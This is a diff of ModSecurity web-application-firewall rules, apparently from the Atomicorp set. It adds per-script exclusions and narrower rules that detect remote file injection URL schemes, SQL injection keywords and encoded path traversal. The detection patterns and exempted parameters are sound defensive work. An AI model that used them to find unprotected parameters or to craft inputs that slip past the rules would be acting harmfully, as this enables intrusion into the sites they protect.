+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:bad_template "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340786,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91399
+
+SecRule REQUEST_FILENAME "/formmail\.php" "phase:2,id:91400,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91401,t:none,pass,nolog,skipAfter:END_RULES_91401"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/form/|!ARGS:/template/|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:this_form "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340787,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/form/|!ARGS:/template/|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:this_form "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340788,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91401
+
+SecRule REQUEST_FILENAME "/free\.cgi" "phase:2,id:91402,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340018"
+
+SecRule REQUEST_FILENAME "/plugins/wp-postratings/postratings-admin-ajax\.php" "phase:2,id:91403,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"
+
+SecRule REQUEST_FILENAME "/search\.php" "phase:2,id:91404,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340026"
+SecAction "phase:2,id:91405,t:none,pass,nolog,skipAfter:END_RULES_91405"
+
+SecRule ARGS|!ARGS:/search/|!ARGS:value|!ARGS:/query/|!ARGS:q|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:file "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340790,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/search/|!ARGS:value|!ARGS:/query/|!ARGS:q|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:file "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340791,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91405
+
+SecRule REQUEST_FILENAME "/online/index\.php" "phase:2,id:91406,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91407,t:none,pass,nolog,skipAfter:END_RULES_91407"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340792,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340793,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91407
+
+SecRule REQUEST_FILENAME "/contenido/main\.php" "phase:2,id:91408,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340213"
+SecAction "phase:2,id:91409,t:none,pass,nolog,skipAfter:END_RULES_91409"
+
+SecRule ARGS|!ARGS:display_query|!ARGS:Db_submit|!ARGS:prev_sql_query|!ARGS:sql_query|!ARGS:Post|!ARGS:text|!ARGS:action|!ARGS:op|!ARGS:setup_db|!ARGS:wptextbox1|!ARGS:message|!ARGS:/^SQL/|!ARGS:query_string|!ARGS:query|!ARGS:description|!ARGS:output "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=)"  	"t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,phase:2,deny,log,auditlog,status:403,id:340795,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection 2'"
+
+SecMarker END_RULES_91409
+
+SecRule REQUEST_FILENAME "/imageresize\.php" "phase:2,id:91410,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"
+
+SecRule REQUEST_FILENAME "/taguchitest\.php" "phase:2,id:91411,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340022,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91412,t:none,pass,nolog,skipAfter:END_RULES_91412"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:r "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340797,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:r "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340798,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91412
+
+SecRule REQUEST_FILENAME "/forums/modcp/moderate\.php" "phase:2,id:91413,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340144"
+SecAction "phase:2,id:91414,t:none,pass,nolog,skipAfter:END_RULES_91414"
+
+SecRule ARGS|!ARGS:/text/|!ARGS:display_query|!ARGS:Db_submit|!ARGS:prev_sql_query|!ARGS:sql_query|!ARGS:Post|!ARGS:text|!ARGS:action|!ARGS:op|!ARGS:setup_db|!ARGS:wptextbox1|!ARGS:message|!ARGS:/^SQL/|!ARGS:query_string|!ARGS:query|!ARGS:description "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=)"  	"t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,phase:2,deny,log,auditlog,status:403,id:340799,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection 2'"
+
+SecMarker END_RULES_91414
+
+SecRule REQUEST_FILENAME "/odp/index\.php" "phase:2,id:91415,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=380007"
+SecAction "phase:2,id:91416,t:none,pass,nolog,skipAfter:END_RULES_91416"
+
+SecRule REQUEST_URI|ARGS|REQUEST_BODY|!ARGS:c "/\w*(\x27|\’)(\x6F|o|\x4F)(\x72|r|\x52)" 	"t:none,t:compressWhitespace,t:lowercase,phase:2,deny,log,auditlog,status:403,id:340800,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: SQL Inject Generic signature'"
+
+SecMarker END_RULES_91416
+
+SecRule REQUEST_FILENAME "/yanner\.php" "phase:2,id:91417,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"
+
+SecRule REQUEST_FILENAME "/pluskernel/settings\.php" "phase:2,id:91418,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91419,t:none,pass,nolog,skipAfter:END_RULES_91419"
+
+SecRule ARGS|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:r "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340801,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:r "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340802,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91419
+
+SecRule REQUEST_FILENAME "/sql_error\.php" "phase:2,id:91420,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/login-register\.php" "phase:2,id:91421,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91422,t:none,pass,nolog,skipAfter:END_RULES_91422"
+
+SecRule ARGS|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:passwordlogin "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340803,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:passwordlogin "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340804,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91422
+
+SecRule REQUEST_FILENAME "/lecture\.php" "phase:2,id:91423,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91424,t:none,pass,nolog,skipAfter:END_RULES_91424"
+
+SecRule ARGS|!ARGS:lec_rm|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:lec_doc "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340805,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:lec_rm|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:lec_doc "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340806,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91424
+
+SecRule REQUEST_FILENAME "/response\.php" "phase:2,id:91425,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91426,t:none,pass,nolog,skipAfter:END_RULES_91426"
+
+SecRule ARGS|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:aardvark_page "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340807,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:aardvark_page "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340808,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91426
+
+SecRule REQUEST_FILENAME "/edit_css\.ph" "phase:2,id:91427,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/modules/mod_oneononechat/phpfunctions\.php" "phase:2,id:91428,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/sql/fileman2\.php" "phase:2,id:91429,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340007"
+SecAction "phase:2,id:91430,t:none,pass,nolog,skipAfter:END_RULES_91430"
+
+SecRule REQUEST_URI|ARGS|!ARGS:dir|!ARGS:/txt/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:wysiwyg_input|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:340810,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied'"
+
+SecMarker END_RULES_91430
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/simple-popup-images/popup\.php" "phase:2,id:91431,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340026"
+
+SecRule REQUEST_FILENAME "/design/swapimages_onmousemove\.js" "phase:2,id:91432,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/edit_image" "phase:2,id:91433,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91434,t:none,pass,nolog,skipAfter:END_RULES_91434"
+
+SecRule ARGS|!ARGS:DirName|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/desc/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:aardvark_page "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340811,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:DirName|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/desc/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:aardvark_page "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340812,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91434
+
+SecRule REQUEST_FILENAME "/server\.php" "phase:2,id:91435,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91436,t:none,pass,nolog,skipAfter:END_RULES_91436"
+
+SecRule ARGS|!ARGS:u|!ARGS:/^p_/|!ARGS:rf|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:aardvark_page "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340813,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:u|!ARGS:/^p_/|!ARGS:rf|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:aardvark_page "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,capture,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340814,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{TX.0},%{matched_var_name}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91436
+
+SecRule REQUEST_FILENAME "/php/compress\.php" "phase:2,id:91437,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/tbl_replace\.php" "phase:2,id:91438,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+
+SecRule REQUEST_FILENAME "wp-content/themes/bobv2/dax\.swf" "phase:2,id:91439,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/wp-admin/plugin-install\.php" "phase:2,id:91440,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91441,t:none,pass,nolog,skipAfter:END_RULES_91441"
+
+SecRule ARGS|!ARGS:s|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:/web/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340815,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:s|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:/web/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340816,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91441
+
